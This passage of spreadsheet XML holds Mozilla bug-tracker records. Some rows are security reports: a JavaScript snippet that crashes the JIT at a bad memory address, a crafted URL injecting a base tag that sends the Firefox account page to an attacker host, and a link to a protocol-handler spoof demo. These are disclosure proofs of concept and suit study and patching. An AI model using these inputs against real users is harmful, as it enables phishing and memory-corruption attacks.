      <c r="P2915" t="inlineStr">
        <is>
          <t>[ccbr][sg:critical?][softblocker][fixed-in-tracemonkey]</t>
        </is>
      </c>
      <c r="Q2915" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2915" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2915" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2915" t="n">
        <v>1</v>
      </c>
      <c r="U2915" t="n">
        <v>0</v>
      </c>
      <c r="V2915" t="n">
        <v>14</v>
      </c>
      <c r="W2915" t="inlineStr">
        <is>
          <t>x = &lt;x/&gt;
for (a = 0; a &lt; 9; a++) {
  x.elements()
}
crashes 64-bit js opt shell on TM changeset db8be4e3f373 with -j at js::ExecuteTree, but does not seem to crash on js debug shell.
s-s because this seems to be accessing a weird memory address at 0xfffb80010050e680
=====
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x000000010019c25b in js::ExecuteTree ()
(gdb) bt
#0  0x000000010019c25b in js::ExecuteTree ()
#1  0x00000001001be04f in js::RecordLoopEdge ()
#2  0x00000001001be45c in js::MonitorLoopEdge ()
#3  0x0000000100094d39 in js::Interpret ()
#4  0x00000001000998f8 in js::Execute ()
#5  0x0000000100016d57 in JS_ExecuteScript ()
#6  0x0000000100005020 in Process ()
#7  0x0000000100009295 in Shell ()
#8  0x00000001000097da in main ()
(gdb) x/i $pc
0x10019c25b &lt;_ZN2jsL11ExecuteTreeEP9JSContextPNS_12TraceMonitorEPNS_12TreeFragmentERjPPNS_10VMSideExitES9_+859&gt;:        incl   0x13c(%rbx)
(gdb) x/b $rbx
0xfffb80010050e680:     Cannot access memory at address 0xfffb80010050e680
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   53579:802d34381fe4
user:        David Mandelin
date:        Fri Sep 03 15:12:38 2010 -0700
summary:     Bug 593497: blacklist using iteration count only if methodjit is enabled, r=dvander</t>
        </is>
      </c>
      <c r="X2915" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2916">
      <c r="A2916" t="n">
        <v>1101158</v>
      </c>
      <c r="B2916" t="inlineStr">
        <is>
          <t>2014-11-18 12:41:17 -0800</t>
        </is>
      </c>
      <c r="C2916" t="inlineStr">
        <is>
          <t>Remote HTML tag injection in Gaia System app</t>
        </is>
      </c>
      <c r="D2916" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:28 -0700</t>
        </is>
      </c>
      <c r="E2916" t="n">
        <v>1</v>
      </c>
      <c r="F2916" t="n">
        <v>1</v>
      </c>
      <c r="G2916" t="n">
        <v>6</v>
      </c>
      <c r="H2916" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2916" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2916" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K2916" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2916" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2916" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2916" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2916" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2916" t="inlineStr">
        <is>
          <t>[systemsfe][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q2916" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2916" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2916" t="inlineStr">
        <is>
          <t>2.2 S1 (5dec)</t>
        </is>
      </c>
      <c r="T2916" t="n">
        <v>1</v>
      </c>
      <c r="U2916" t="n">
        <v>0</v>
      </c>
      <c r="V2916" t="n">
        <v>42</v>
      </c>
      <c r="W2916" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.6 Safari/537.36
Steps to reproduce:
1. Start Firefox OS 2.2 simulator from app-manager.
2. Open Browser app and launch following link.
http://alice.csrf.jp/http.php?s=308&amp;u=https://www.google.co.jp/search?q=%3Cbase+href%3D%22http%3A%2F%2Fmallory.csrf.jp%2Ffake%2F%22%3E
3. Browser shows the search result of &lt;base href="..."&gt;
4. Push HOME button and return to home screen
5. Long push HOME button and close Browser app window by 'x' button on the screen
6. Open Settings app and choose Find My Device
7. If a user doesn't enable the function, "Create account or sign in" button is shown on the screen.
8. Click the "Create account or sign in" button
Actual results:
http://mallory.csrf.jp/fxa/fxa_module.html is shown instead of legitimate Firefox account creation page.
Expected results:
/fxa/fxa_module.html in the application is shown.</t>
        </is>
      </c>
      <c r="X2916" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2917">
      <c r="A2917" t="n">
        <v>1318039</v>
      </c>
      <c r="B2917" t="inlineStr">
        <is>
          <t>2016-11-16 09:24:59 -0800</t>
        </is>
      </c>
      <c r="C2917" t="inlineStr">
        <is>
          <t>Crash in vcruntime140.dll@0xc5aa | js::CompileAsmJS ,  when  running Nightly 64bit with profile which had been used 32bit</t>
        </is>
      </c>
      <c r="D2917" t="inlineStr">
        <is>
          <t>2018-04-15 14:10:50 -0700</t>
        </is>
      </c>
      <c r="E2917" t="n">
        <v>1</v>
      </c>
      <c r="F2917" t="n">
        <v>1</v>
      </c>
      <c r="G2917" t="n">
        <v>3</v>
      </c>
      <c r="H2917" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2917" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2917" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2917" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2917" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2917" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N2917" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2917" t="inlineStr"/>
      <c r="Q2917" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2917" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2917" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2917" t="n">
        <v>1</v>
      </c>
      <c r="U2917" t="n">
        <v>0</v>
      </c>
      <c r="V2917" t="n">
        <v>24</v>
      </c>
      <c r="W2917" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-821ddbf6-f0c6-45ba-8df8-eeb082161116.
=============================================================
Reproducible: 100%
Steps To Reproduce:
1. Create New profile with Nightly53.0a1 32bit.
2. Start Nightly53.0a1 32bit with the profile
3. Open http://beta.unity3d.com/jonas/AngryBots/ and wait to start the game
4. Quit browser
5. Start Nightly53.0a1 x64 with the same profile of step2
6. Open http://beta.unity3d.com/jonas/AngryBots/
Actual Results:
Tab crashes
Expected Results:
Not crash</t>
        </is>
      </c>
      <c r="X2917" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2918">
      <c r="A2918" t="n">
        <v>1490276</v>
      </c>
      <c r="B2918" t="inlineStr">
        <is>
          <t>2018-09-11 05:37:41 -0700</t>
        </is>
      </c>
      <c r="C2918" t="inlineStr">
        <is>
          <t>UI spoof when adding protocol handler</t>
        </is>
      </c>
      <c r="D2918" t="inlineStr">
        <is>
          <t>2020-08-07 18:57:47 -0700</t>
        </is>
      </c>
      <c r="E2918" t="n">
        <v>1</v>
      </c>
      <c r="F2918" t="n">
        <v>1</v>
      </c>
      <c r="G2918" t="n">
        <v>6</v>
      </c>
      <c r="H2918" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2918" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J2918" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K2918" t="inlineStr">
        <is>
          <t>62 Branch</t>
        </is>
      </c>
      <c r="L2918" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2918" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2918" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2918" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+]</t>
        </is>
      </c>
      <c r="Q2918" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2918" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2918" t="inlineStr">
        <is>
          <t>Firefox 64</t>
        </is>
      </c>
      <c r="T2918" t="n">
        <v>1</v>
      </c>
      <c r="U2918" t="n">
        <v>0</v>
      </c>
      <c r="V2918" t="n">
        <v>27</v>
      </c>
      <c r="W2918" t="inlineStr">
        <is>
          <t>Created attachment 9008034
protocal_handler.jpg
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Firefox for Android
Steps to reproduce:
online demo: http://f.3cm.me/r/phandler_spoof.html
attacker could spoof the handler's domain.
Actual results:
see protocal_handler.jpg
Expected results:
function registerProtocolHandler('mailto', 'url', 'title');
It should just show 
adding "title" on f.3cm as an application for mailto links</t>
        </is>
      </c>
      <c r="X2918" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2919">
      <c r="A2919" t="n">
        <v>1205286</v>
      </c>
      <c r="B2919" t="inlineStr">
        <is>
          <t>2015-09-16 07:04:01 -0700</t>
        </is>
      </c>
      <c r="C2919" t="inlineStr">
        <is>
          <t>About:home sync icon should link to about:preferences#sync</t>
        </is>
      </c>
      <c r="D2919" t="inlineStr">
        <is>
          <t>2015-11-03 22:14:36 -0800</t>
        </is>
      </c>
      <c r="E2919" t="n">
        <v>1</v>
      </c>
      <c r="F2919" t="n">
        <v>1</v>
      </c>
      <c r="G2919" t="n">
        <v>2</v>
      </c>
      <c r="H2919" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2919" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2919" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2919" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2919" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2919" t="inlineStr"/>
      <c r="Q2919" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2919" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T2919" t="n">
        <v>1</v>
      </c>
      <c r="U2919" t="n">
        <v>0</v>
      </c>
      <c r="V2919" t="n">
        <v>12</v>
      </c>
      <c r="W2919" t="inlineStr">
        <is>
          <t>About:home sync icon should open about:preferences#sync in a new tab but currently links to about:accounts?entrypoint=abouthome (not in a new tab)</t>
        </is>
      </c>
      <c r="X2919" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2920">
      <c r="A2920" t="n">
        <v>1096436</v>
      </c>
      <c r="B2920" t="inlineStr">
        <is>
          <t>2014-11-10 09:47:39 -0800</t>
        </is>
      </c>
      <c r="C2920" t="inlineStr">
        <is>
          <t>Possibility to directly switch to facet after search and from links</t>
        </is>
      </c>
      <c r="D2920" t="inlineStr">
        <is>
          <t>2014-12-01 19:14:06 -0800</t>
        </is>
      </c>
      <c r="E2920" t="n">
        <v>1</v>
      </c>
      <c r="F2920" t="n">
        <v>1</v>
      </c>
      <c r="G2920" t="n">
        <v>4</v>
      </c>
      <c r="H2920" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2920" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2920" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K2920" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2920" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2920" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2920" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2920" t="inlineStr"/>
      <c r="Q2920" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2920" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2920" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2920" t="n">
        <v>1</v>
      </c>
      <c r="U2920" t="n">
        <v>0</v>
      </c>
      <c r="V2920" t="n">
        <v>5</v>
      </c>
      <c r="W2920" t="inlineStr">
        <is>
          <t>When I do a search with a facet, I almost always want to see the facet view right away and not the individual crash reports. It's inconvenient to always need to do this extra click and I find it a regression from Advanced Search that I need it.
Also, I'd like to be able to link other people directly to the facet view.</t>
        </is>
      </c>
      <c r="X2920" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2921">
      <c r="A2921" t="n">
        <v>863595</v>
      </c>
      <c r="B2921" t="inlineStr">
        <is>
          <t>2013-04-19 00:35:16 -0700</t>
        </is>
      </c>
      <c r="C2921" t="inlineStr">
        <is>
          <t>[Buri][SOS]NO any prompts during a call, when dial a emergency call from emergency call keypad.</t>
        </is>
      </c>
      <c r="D2921" t="inlineStr">
        <is>
          <t>2013-05-17 02:42:47 -0700</t>
        </is>
      </c>
      <c r="E2921" t="n">
        <v>1</v>
      </c>
      <c r="F2921" t="n">
        <v>1</v>
      </c>
      <c r="G2921" t="n">
        <v>6</v>
      </c>
      <c r="H2921" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2921" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2921" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K2921" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2921" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2921" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2921" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2921" t="inlineStr">
        <is>
          <t>[status:  awaiting landing of r+'d bug 866481] u=fx-os-user c=may-6-17 p=1, [target:05/17]</t>
        </is>
      </c>
      <c r="Q2921" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2921" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2921" t="inlineStr">
        <is>
          <t>1.0.1 IOT1 (10may)</t>
        </is>
      </c>
      <c r="T2921" t="n">
        <v>1</v>
      </c>
      <c r="U2921" t="n">
        <v>0</v>
      </c>
      <c r="V2921" t="n">
        <v>45</v>
      </c>
      <c r="W2921" t="inlineStr">
        <is>
          <t>AU_LINUX_GECKO_ICS_STRAWBERRY_V1.01.00.01.019.077
 Firefox os  v1.0.1
 Mozilla build ID:20130414070204
 +++ This bug was initially created as a clone of Bug #443235 +++
 DEFECT DESCRIPTION:
 [SOS]NO any prompts during a call, when dial a emergency call from emergency call keypad.
  REPRODUCING PROCEDURES:
 1.enable Lock screen and password lock
 2.make a call(10010) -&gt; during the call
 3.press power key to lock screen -&gt; wake up the screen
 4.press Home key switch the call to background -&gt; unlock the screen -&gt; on the password keypad press "Emergency call" -&gt; show the emergency call keypad
 5.dial 112
 6.no any prompts and can not dial out
  EXPECTED BEHAVIOUR:
 Pop up some prompts that the user is already in the call.
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:
 ++++++++++ end of initial bug #443235 description ++++++++++
 CONTACT INFO (Name,Phone number):
  DEFECT DESCRIPTION:
  REPRODUCING PROCEDURES:
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X2921" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2922">
      <c r="A2922" t="n">
        <v>738286</v>
      </c>
      <c r="B2922" t="inlineStr">
        <is>
          <t>2012-03-22 09:09:45 -0700</t>
        </is>
      </c>
      <c r="C2922" t="inlineStr">
        <is>
          <t>Turn off Tinderbox email for the Jetpack tree</t>
        </is>
      </c>
      <c r="D2922" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2922" t="n">
        <v>1</v>
      </c>
      <c r="F2922" t="n">
        <v>1</v>
      </c>
      <c r="G2922" t="n">
        <v>5</v>
      </c>
      <c r="H2922" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2922" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2922" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2922" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2922" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2922" t="inlineStr">
        <is>
          <t>[jetpack][die-tinderbox-die][simple]</t>
        </is>
      </c>
      <c r="Q2922" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2922" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2922" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2922" t="n">
        <v>1</v>
      </c>
      <c r="U2922" t="n">
        <v>0</v>
      </c>
      <c r="V2922" t="n">
        <v>6</v>
      </c>
      <c r="W2922" t="inlineStr">
        <is>
          <t>Bug 713846 got their logs uploading, they're happy with buildbot-based tbpl, and victory for me is to see Tinderbox increasingly isolated and alone, repeatedly clicking "Get Mail" while "no new messages" burns into its monitor.</t>
        </is>
      </c>
      <c r="X2922" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2923">
      <c r="A2923" t="n">
        <v>468211</v>
      </c>
      <c r="B2923" t="inlineStr">
        <is>
          <t>2008-12-05 21:26:10 -0800</t>
        </is>
      </c>
      <c r="C2923" t="inlineStr">
        <is>
          <t>Crash [@ nsCSSFrameConstructor::AdjustParentFrame] with DOMAttrModified, observes, binding and focusing</t>
        </is>
      </c>
      <c r="D2923" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2923" t="n">
        <v>1</v>
      </c>
      <c r="F2923" t="n">
        <v>1</v>
      </c>
      <c r="G2923" t="n">
        <v>3</v>
      </c>
      <c r="H2923" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2923" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2923" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2923" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2923" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2923" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2923" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2923" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2923" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2923" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2923" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2923" t="n">
        <v>1</v>
      </c>
      <c r="U2923" t="n">
        <v>0</v>
      </c>
      <c r="V2923" t="n">
        <v>44</v>
      </c>
      <c r="W2923" t="inlineStr">
        <is>
          <t>Created attachment 351659
testcase
See testcase, which crashes current trunk build within 100ms.
This regressed between 2008-09-11 and 2008-09-12:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2008-09-11+10%3A00%3A00&amp;enddate=2008-09-12+03%3A00%3A00
I think a regression from bug 454361 somehow.
http://crash-stats.mozilla.com/report/index/6e989257-4557-4111-aa89-7695d2081205?p=1
0  	xul.dll  	nsCSSFrameConstructor::AdjustParentFrame  	 layout/base/nsCSSFrameConstructor.cpp:3407
1 	xul.dll 	nsCSSFrameConstructor::ConstructFrameInternal 	layout/base/nsCSSFrameConstructor.cpp:7494
2 	xul.dll 	nsCSSFrameConstructor::ConstructFrame 	layout/base/nsCSSFrameConstructor.cpp:7406
3 	xul.dll 	nsCSSFrameConstructor::ContentInserted 	layout/base/nsCSSFrameConstructor.cpp:8997
4 	xul.dll 	nsCSSFrameConstructor::RecreateFramesForContent 	layout/base/nsCSSFrameConstructor.cpp:11143
5 	xul.dll 	nsCSSFrameConstructor::ProcessRestyledFrames 	layout/base/nsCSSFrameConstructor.cpp:9868
6 	xul.dll 	nsCSSFrameConstructor::RestyleElement 	layout/base/nsCSSFrameConstructor.cpp:9942
7 	xul.dll 	nsCSSFrameConstructor::ProcessOneRestyle 	layout/base/nsCSSFrameConstructor.cpp:13280
8 	xul.dll 	nsCSSFrameConstructor::ProcessPendingRestyles 	layout/base/nsCSSFrameConstructor.cpp:13378
9 	xul.dll 	PresShell::DoFlushPendingNotifications 	layout/base/nsPresShell.cpp:4541
10 	xul.dll 	PresShell::FlushPendingNotifications 	layout/base/nsPresShell.cpp:4505
11 	xul.dll 	nsCSSFrameConstructor::RestyleEvent::Run 	layout/base/nsCSSFrameConstructor.cpp:13451
12 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
13 	xul.dll 	nsBaseAppShell::Run 	widget/src/xpwidgets/nsBaseAppShell.cpp:170
14 	nspr4.dll 	PR_GetEnv 	
15 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:87
16 	firefox.exe 	firefox.exe@0x2197 	
17 	kernel32.dll 	BaseProcessStart</t>
        </is>
      </c>
      <c r="X2923" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2924">
      <c r="A2924" t="n">
        <v>1373938</v>
      </c>
      <c r="B2924" t="inlineStr">
        <is>
          <t>2017-06-17 06:24:13 -0700</t>
        </is>
      </c>
      <c r="C2924" t="inlineStr">
        <is>
          <t>Submit worker type pending count data to statsum and/or ActiveData</t>
        </is>
      </c>
      <c r="D2924" t="inlineStr">
        <is>
          <t>2019-02-08 13:21:35 -0800</t>
        </is>
      </c>
      <c r="E2924" t="n">
        <v>1</v>
      </c>
      <c r="F2924" t="n">
        <v>1</v>
      </c>
      <c r="G2924" t="n">
        <v>5</v>
      </c>
      <c r="H2924" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2924" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J2924" t="inlineStr">
        <is>
          <t>Services</t>
        </is>
      </c>
      <c r="K2924" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2924" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2924" t="inlineStr"/>
      <c r="Q2924" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2924" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2924" t="n">
        <v>1</v>
      </c>
      <c r="U2924" t="n">
        <v>0</v>
      </c>
      <c r="V2924" t="n">
        <v>14</v>
      </c>
      <c r="W2924" t="inlineStr">
        <is>
          <t>It appears that release engineering has graphs in grafana to show historical data about pending counts.
The taskcluster team has graphs about pending wait times within signalfx, but those might not be the same numbers that are helpful to releng and it's protected behind a login.
I'm not sure the mechanism that acquires that data from buildbot to send to graphite, but perhaps we can adapt it to periodically look at the pending counts for worker types that releng is concerned with and stuff it in there.  I'm happy to help in any way that I can.</t>
        </is>
      </c>
      <c r="X2924" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2925">
      <c r="A2925" t="n">
        <v>607872</v>
      </c>
      <c r="B2925" t="inlineStr">
        <is>
          <t>2010-10-27 22:24:42 -0700</t>
        </is>
      </c>
      <c r="C2925" t="inlineStr">
        <is>
          <t>Shouldn't be able to reach 2.0.2 Fennec URLs (which 404), since 2.01a is the latest version</t>
        </is>
      </c>
      <c r="D2925" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E2925" t="n">
        <v>1</v>
      </c>
      <c r="F2925" t="n">
        <v>1</v>
      </c>
      <c r="G2925" t="n">
        <v>4</v>
      </c>
      <c r="H2925" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2925" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2925" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2925" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2925" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2925" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2925" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2925" t="inlineStr"/>
      <c r="Q2925" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2925" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2925" t="inlineStr">
        <is>
          <t>1.7.7</t>
        </is>
      </c>
      <c r="T2925" t="n">
        <v>1</v>
      </c>
      <c r="U2925" t="n">
        <v>0</v>
      </c>
      <c r="V2925" t="n">
        <v>3</v>
      </c>
      <c r="W2925" t="inlineStr">
        <is>
          <t>http://crash-stats.stage.mozilla.com/products/Fennec/versions/2.0.2/builds and http://crash-stats.stage.mozilla.com/products/Fennec/versions/2.0.2 are 404s.
STR:
1. Load http://crash-stats.stage.mozilla.com/products/Fennec
2. Choose "Top Crashers by Domain" (http://crash-stats.stage.mozilla.com/topcrasher/bydomain/Fennec/2.0.2)
3. Now, choose "Nightly Builds" (http://crash-stats.stage.mozilla.com/products/Fennec/versions/2.0.2/builds)</t>
        </is>
      </c>
      <c r="X2925" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2926">
      <c r="A2926" t="n">
        <v>395623</v>
      </c>
      <c r="B2926" t="inlineStr">
        <is>
          <t>2007-09-09 22:04:29 -0700</t>
        </is>
      </c>
      <c r="C2926" t="inlineStr">
        <is>
          <t>[FIX]"ASSERTION: not in child list" and crash with position:inherit, counters, :first-line</t>
        </is>
      </c>
      <c r="D2926" t="inlineStr">
        <is>
          <t>2017-05-01 17:40:23 -0700</t>
        </is>
      </c>
      <c r="E2926" t="n">
        <v>1</v>
      </c>
      <c r="F2926" t="n">
        <v>1</v>
      </c>
      <c r="G2926" t="n">
        <v>3</v>
      </c>
      <c r="H2926" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2926" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2926" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2926" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2926" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2926" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2926" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2926" t="inlineStr">
        <is>
